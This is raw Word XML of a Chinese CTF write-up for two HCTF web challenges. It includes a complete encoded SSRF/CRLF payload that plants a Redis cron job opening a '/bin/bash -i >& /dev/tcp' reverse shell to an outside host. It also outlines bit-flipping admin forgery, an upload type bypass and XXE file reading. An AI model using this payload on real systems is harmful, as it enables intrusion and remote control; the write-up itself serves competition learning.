    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>5、mdzz，没人注意到nosql的语法吗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hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://atfield.hctf.io</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F9152E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</w:p>
    <w:p w:rsidR="0083309F" w:rsidRPr="0083309F" w:rsidRDefault="0083309F" w:rsidP="0083309F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  <w:r w:rsidRPr="0083309F">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>接着AT1的套路，找了台有域名的服务器写一个302跳转就开始扫内网，扫出了一堆其他题的ip，这时候出题的师傅放提示了，说是nosql，瞬间想到了redis。于是又架起burp扫开放6379的IP，（期间电脑还被封了，至今没解封 &gt;_&lt;），扫到了192.168.0.10这台服务器开了redis服务。同时根据服务器的报错信息判断是python的站，用的urllib做的请求，因此很自然联想到了http头部注入。去网上找了一篇[博客](https://security.tencent.com/index.php/blog/msg/106)，将跳转参数后面的内容url编码了3次，结果始终没有成功。仔细读了下payload，发现是一个其中redis表示参数字节数的值填错了，改正之后成功弹shell，下面是最终payload：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083309F" w:rsidRPr="0083309F" w:rsidRDefault="0083309F" w:rsidP="0083309F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</w:p>
    <w:p w:rsidR="0083309F" w:rsidRPr="0083309F" w:rsidRDefault="0083309F" w:rsidP="0083309F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83309F">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083309F" w:rsidRPr="0083309F" w:rsidRDefault="0083309F" w:rsidP="0083309F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83309F">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>link=http://xxx.xxx/test.php?a=http%253A%252f%252f192.168.0.10%25250d%25250a%252a3%25250d%25250a%2525243%25250d%25250aset%25250d%25250a%2525241%25250d%25250a1%25250d%25250a%25252464%25250d%25250a%25250a%252a%25252f1%252520%252a%252520%252a%252520%252a%252520%252a%252520%25252fbin%25252fbash%252520-</w:t>
      </w:r>
      <w:r w:rsidRPr="0083309F">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>i%252520%25253e%252526%252520%25252fdev%25252ftcp%25252fx.x.x.x%25252f2335%2525200%25253e%2525261%25250a%25250d%25250aconfig%252520set%252520dir%252520%25252fvar%25252fspool%25252fcron%25252f%25250d%25250aconfig%252520set%252520dbfilename%252520root%25250d%25250asave%25250d%25250a%253A6379%252f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083309F" w:rsidRPr="0083309F" w:rsidRDefault="0083309F" w:rsidP="0083309F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83309F">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083309F" w:rsidRPr="0083309F" w:rsidRDefault="0083309F" w:rsidP="0083309F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</w:p>
    <w:p w:rsidR="0083309F" w:rsidRDefault="0083309F" w:rsidP="0083309F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83309F">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进去之后flag就在根目录下，由于是root权限，所以忍不住做了点事，可能导致最后好像就我们交了flag，求@LoRexxar师傅不打我（逃</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083309F" w:rsidRPr="00764553" w:rsidRDefault="0083309F" w:rsidP="0083309F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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00E14965" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc468128546"/>
      <w:r w:rsidRPr="00764553">
        <w:t>==========</w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:t>==========</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc468128547"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">18 </w:t>
      </w:r>
      <w:r w:rsidR="00DA455B" w:rsidRPr="00764553">
        <w:t>魔法禁书目录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidR="00DA455B" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>风雨再临 卷土重来</w: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hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://index-librorum-prohibitorum.hctf.io</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E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这一题和level</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4的</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “大图书馆的牧羊人”用的是同一套代码，从队友处得到了他们在上一题捡到的源码，审一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，大概分三步：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0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比特反转伪造admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0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lastRenderedPageBreak/>
        <w:t>这个可以参考火日师傅的原题：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0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http://www.firesun.me/san-ge-bai-mao-zhi-zhao-pin-you-kai-shi-liao-ni-pa-liao-ma-writeup/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0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文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0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上传文件有限制类型，看源码直接改type为zip-epub即可，上传后的文件会被解压，但是不会解析PHP，所以没办法直接上传getshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XXE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26652E50" wp14:editId="12AE7A9F">
            <wp:extent cx="5274310" cy="2876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5B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0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看upload.php解析XML的代码明显留下了一个XXE漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AA2EB25" wp14:editId="6723CBEC">
            <wp:extent cx="5274310" cy="40322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5B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0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t>上传后解析epub文件会输出text节点内容，直接构造包含XXE payload的文件替换一个正常epub中的ncx即可，这里需要用filter进行编码后再引入实体，否则flag文件内的尖括号会导致错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="635302A3" wp14:editId="02990242">
            <wp:extent cx="5274310" cy="21647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5B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0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lastRenderedPageBreak/>
        <w:t>最终上传的文件如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="005C5BBB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:object w:dxaOrig="1520" w:dyaOrig="1057">
          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:76.4pt;height:53.2pt" o:ole="">
            <v:imagedata r:id="rId68" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1031" DrawAspect="Icon" ObjectID="_1541871204" r:id="rId69"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00DA455B" w:rsidRPr="007645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Regular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56378"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F20C624"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCountingThousand"/>
      <w:pStyle w:val="-"/>
      <w:lvlText w:val="第%1章"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="32"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-0"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="695"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-1"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="476"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        <w:b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4F5B136B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D994A188"/>
    <w:lvl w:ilvl="0" w:tplc="0A8C11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12786E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D08AE962"/>
    <w:lvl w:ilvl="0" w:tplc="1BBC6EC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5BC"/>
    <w:rsid w:val="00036147"/>
    <w:rsid w:val="0004519E"/>
    <w:rsid w:val="0012558D"/>
    <w:rsid w:val="0017707A"/>
    <w:rsid w:val="001C162A"/>
    <w:rsid w:val="002F7AC7"/>
    <w:rsid w:val="0035085D"/>
    <w:rsid w:val="003807ED"/>
    <w:rsid w:val="00383160"/>
    <w:rsid w:val="005351C6"/>
    <w:rsid w:val="005C5BBB"/>
    <w:rsid w:val="00764553"/>
    <w:rsid w:val="007B65BC"/>
    <w:rsid w:val="0083309F"/>
    <w:rsid w:val="008C579C"/>
    <w:rsid w:val="008F0EAB"/>
    <w:rsid w:val="00B67F96"/>
    <w:rsid w:val="00DA455B"/>
    <w:rsid w:val="00DE00BE"/>
    <w:rsid w:val="00E14965"/>
    <w:rsid w:val="00F84102"/>
    <w:rsid w:val="00F9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FDA78"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{31BE340B-16FB-4619-A251-F4829DDB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83160"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="288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31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31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83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2">
    <w:name w:val="毕-参考文献"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="-Char"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:ind w:left="200" w:rightChars="85" w:right="85" w:hangingChars="200" w:hanging="200"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="-Char">
    <w:name w:val="毕-参考文献 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="-2"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-0">
    <w:name w:val="毕-二级标题"/>
    <w:basedOn w:val="2"/>
    <w:link w:val="-Char0"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="0" w:line="288" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="-Char0">
    <w:name w:val="毕-二级标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="-0"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体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3831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-1">
    <w:name w:val="毕-三级标题"/>
    <w:basedOn w:val="3"/>
    <w:link w:val="-Char1"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="0" w:line="288" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="-Char1">
    <w:name w:val="毕-三级标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="-1"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman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383160"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a4">
    <w:name w:val="毕设正文"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="毕设正文 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-">
    <w:name w:val="毕-一级标题"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="-Char2"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="0" w:line="288" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="-Char2">
    <w:name w:val="毕-一级标题 Char"/>
    <w:basedOn w:val="10"/>
    <w:link w:val="-"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44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83160"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-3">
    <w:name w:val="毕-正文"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="-Char3"/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="-Char3">
    <w:name w:val="毕-正文 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="-3"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a5">
    <w:name w:val="论文题目"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char0"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="论文题目 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:aliases w:val="毕业设计"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="12"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1440"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
      </w:tabs>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:ind w:firstLineChars="200" w:firstLine="480"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Calibri"/>
      <w:bCs/>
      <w:caps/>
      <w:noProof/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="目录 1 字符"/>
    <w:aliases w:val="毕业设计 字符"/>
    <w:link w:val="11"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Calibri"/>
      <w:bCs/>
      <w:cap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qFormat/>
    <w:rsid w:val="0017707A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:left="238" w:firstLineChars="200" w:firstLine="480"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Calibri"/>
      <w:smallCaps/>
      <w:noProof/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a6">
    <w:name w:val="中文摘要正文"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:qFormat/>
    <w:rsid w:val="00383160"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="中文摘要正文 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:rsid w:val="00383160"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
